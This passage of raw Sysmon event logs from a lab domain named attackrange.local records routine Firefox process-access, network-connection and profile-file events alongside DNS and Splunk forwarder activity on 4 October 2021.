Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.837{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51766-false93.184.220.29-80http 354300x8000000000000000105592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.800{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63400- 354300x8000000000000000105591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.798{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60997- 354300x8000000000000000105590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.790{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60722- 354300x8000000000000000105589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.789{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51764-false18.66.145.132-443https 354300x8000000000000000105588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.783{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65192- 354300x8000000000000000105587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.668{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51763-false34.214.179.131ec2-34-214-179-131.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000105586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.482{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\search.json.mozlz4MD5=EDC2299EBA84E99AF7C7438ECB7A6CF4,SHA256=CF230F5192B5F53B410CB948B49A0BE09FAD7E80B9125E0D4F348C12C12BC9B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.510{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51761-false93.184.220.29-80http 354300x8000000000000000105584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.509{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52258- 354300x8000000000000000105583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.509{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51762-false2.16.216.48a2-16-216-48.deploy.static.akamaitechnologies.com80http 354300x8000000000000000105582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.509{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60355- 354300x8000000000000000105581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.507{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63554- 354300x8000000000000000105580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.494{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51760-false10.0.1.12-8000- 354300x8000000000000000105579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.488{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51758-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x8000000000000000105578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.488{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51759-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x8000000000000000105577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.487{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51757-false35.227.207.240240.207.227.35.bc.googleusercontent.com443https 354300x8000000000000000105576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.487{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62510- 354300x8000000000000000105575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.486{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51756-false35.227.207.240240.207.227.35.bc.googleusercontent.com443https 354300x8000000000000000105574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.485{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50078- 354300x8000000000000000105573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.485{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57973- 354300x8000000000000000105572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.482{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62561- 354300x8000000000000000105571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.444{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51755-false52.222.236.38server-52-222-236-38.fra56.r.cloudfront.net443https 354300x8000000000000000105570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.443{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64848- 354300x8000000000000000105569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.443{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63036- 354300x8000000000000000105568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.436{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61398- 354300x8000000000000000105567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.410{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57538-true2001:500:2:0:0:0:0:cc.root-servers.net53domain 354300x8000000000000000105566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.405{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51752-false44.236.48.31ec2-44-236-48-31.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000105565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.351{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=091E8D95F5B565FE9B8DBFD41522F973,SHA256=E0541CE7C0A50C5328D3FA42FC2190B3F5FBC5A96A9DA3E879E9A06225E7E009,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.314{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.182{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\pending_pings\6cbb3db4-835c-4a01-b544-4489b8019eebMD5=BEBFAC8AFCF96DF5E0B3FDD034A5394D,SHA256=08A68E5642D5E1884578CE49CC89459DAF85E7EDAEB377BE70E26D43370FA590,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.182{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.182{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.182{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.182{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.167{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082836Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B429-615A-7C01-00000000FD01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082835Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:33.026{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082834Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 